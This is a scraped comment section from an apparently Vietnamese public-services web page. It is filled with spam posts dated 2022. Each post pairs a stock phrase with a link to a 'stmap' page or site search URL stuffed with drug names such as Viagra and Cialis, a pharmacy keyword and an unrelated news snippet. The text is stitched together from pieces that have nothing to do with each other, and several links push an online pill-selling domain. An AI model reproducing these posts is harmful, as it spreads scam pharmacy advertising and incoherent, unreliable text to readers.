What's the exchange rate for euros? https://proudlyyours.com/stmap_24pkcjjq.html?duphalac.claritin.vepesid.levitra benzac cream for acne If you're searching for the magical elixir to cure a hangover, Chinese researchers may have found it. The solution: lemon-lime flavored soda Sprite. But if you prefer to skip the sweet stuff, soda water is a good alternative, findings showed.

BPFEcE
4/24/2022 12:41:38 PM

Jonny was here http://photosintesi.com/stmap_37lbquli.html?levitra.hydrea.glipizide.oxytetracycline minoxidil & finasteride lipid solution for topical application reviews Professor Boyd added: "The award will expedite preparatory work for the dictionary which will, in time, give Gaelic a resource comparable to the Dictionary of the Older Scottish Tongue and the Oxford English Dictionary."

y3qHgI
5/20/2022 11:39:42 AM

Punk not dead https://test.produkter.furnes.se/stmap_19zwkycw.html?valproic.levitra.tadora cataflam cseppek hol kaphat The team was put up for sale in February 2011. Afterinvestment bank Moag & Co. was hired to oversee the sale,Vanderbeek said in a statement that his minority partner, BrickCity, and he had differing visions and that their partnershipagreement allowed Brick City to seek a sale. Vanderbeek said heintended to maintain a controlling interest.

WW0uoy
5/20/2022 11:40:12 AM

Can I call you back? http://www.kobify.com/stmap_54yebbug.html?cialis.avandamet.medroxyprogesterone.phenytoin diclofenac omeprazol bago He was convicted of killing his parents, Johnny and Carol Yowell, in 1998 and setting fire to their home in Lubbock, Texas. According to court records, Yowell told authorities he shot his father and then beat, strangled and killed his mother. He then blew up the house.

agudD
5/20/2022 11:40:37 AM

Recorded Delivery https://dev.glasfaser.netinsiders.de/stmap_19zwkycw.html?cialis.kerlone.edegra para que sirve pastillas de escitalopram For example, health officials have seen high success rates with a three-dose vaccine series for hepatitis B, a contagious liver disease. The doses for hepatitis B vaccine are typically given at birth and through the first few months of a child's life.

F0f9r
5/20/2022 11:41:03 AM

I read a lot http://devinswany.com/stmap_54yebbug.html apo-doxazosin side effects Microsoft came under fire from gamers after initially saying it would set restrictions on used games, and require an Internet connection to play. After a flurry of complaints, the company reversed its policies in June. In contrast, Sony has consistently touted support for used games and offline gameplay at industry events. And the PS4 comes $100 cheaper.

I4Kfpp
5/20/2022 11:41:24 AM

Could I have a statement, please? https://massivetradinginvestment.com/stmap_31fqfoiz.html?speman.cialis.haldol is prednisone used for tinnitus The Jack Geary Gallery, a deli turned showroom, displays Brooklyn artist Vadis Turner’s ethereal tapestries on the shop’s white walls. The artist provokes the viewer into considering woven works as high art — even if some of that art is made from tampons.

Douc1l
5/29/2022 9:04:18 PM

I can't get a signal https://obi-coach.com/stmap_54xzbfos.html?zovirax.chlorzoxazone.viagra.methocarbamol meloxicam for parrots "However difficult it must have been for her to leave Adoptive Couple's home when she was just over 2 years old, it will be equally devastating now if, at the age of 3½, she is again removed from her home and sent to live halfway across the country," Sotomayor wrote.

qrGH7
5/29/2022 9:04:50 PM

Best Site Good Work https://obi-coach.com/stmap_19xorppt.html?cellcept.alli.cialis.pioglitazone zantac bloating The passengers are seeking design, manufacturing and safetyinformation, as well as maintenance records and other relevantevidence, in order to determine legal liability for the crash,according to their lawyers.

wThMo
5/29/2022 9:05:10 PM

A book of First Class stamps http://timer.unbound.services/stmap_31fqfoiz.html?imodium.cialis.diabecon nootropil precio san pablo The Fed will announce its decision in a statement following a two-day meeting at 2 p.m. (1800 GMT), and Fed Chairman Ben Bernanke will hold a news conference a half hour later. It is also set to release fresh quarterly economic and interest rate projections.

dHqTxt
6/18/2022 1:41:32 AM

Recorded Delivery http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Kupnja%20Viagra%20Bez%20Recepta%20-%20Prospect%20Viagra%2050%20Mg prospect viagra 50 mg Mandela again quoted from the "I Have a Dream" speech — "Free at last, free at last, thank God Almighty we are free at last" — during his 1994 address to the U.S. Congress. Mandela, 95, has been hospitalized since June, much of that time in critical condition.

HN6iwy
6/18/2022 1:41:59 AM

Sorry, you must have the wrong number http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Viagra%20Warnings%20Dangers%20-%20Where%20To%20Get%20Viagra%20Samples where to get viagra samples The bird itself, in a gorgeous powder blue that’s just a little bit paler than Yves Klein’s famous indigo hue, is one of the jolliest things to have sat upon the square’s spare plinth since the public art commissions for it began in 2005.

gQKd7
6/18/2022 1:42:32 AM

Could you transfer $1000 from my current account to my deposit account? http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Viagra%20Tricare%20-%20Viagra%20Hinta%20Ilman%20Resepti viagra hinta ilman resepti If some of that artistry bordered on illegality, the latest project, four years in the making, dives straight in. Normally outspoken - "If you're an artist and not taking risks, you're really just masturbating" - Riley became more guarded when discussing how the pigeons got to and from Cuba.

EcUOKU
6/18/2022 1:42:54 AM

I'm doing a phd in chemistry http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Viagra%20Espanja%20-%20Viagra%20Gnrique%20Prix viagra gnrique prix Kalinin and Drinkman were previously charged in New Jerseyas "Hacker 1" and "Hacker 2" in a 2009 indictment chargingGonzalez, 32, in connection with five breaches - including oneon Heartland Payment Systems.

fQ3XYY
6/18/2022 1:43:20 AM

Photography http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Sildenafil%20%28viagra%29%20-%20Kuinka%20Saada%20Viagra%20Resepti kuinka saada viagra resepti "Savings made as a result of proposed changes to ouroperational model will be passed on in the form of pricereductions, ensuring our medicines are more affordable toChinese patients," Hussain added.

Dịch vụ công trực tuyến mức độ 3tra cuu tinh trang su ly ho so Hệ thống một cửaEofficeso nghanh dia phuong Tra cuu tthcTra cuu van ban Tra cuu đo 3 Tra cuu hs mot cua Nộp trực tuyếnÝ kiến công dân
Tin nổi bật
THĂM DÒ Ý KIẾNVideo

2/2/2023 1:08:06 AM

^ Về đầu trang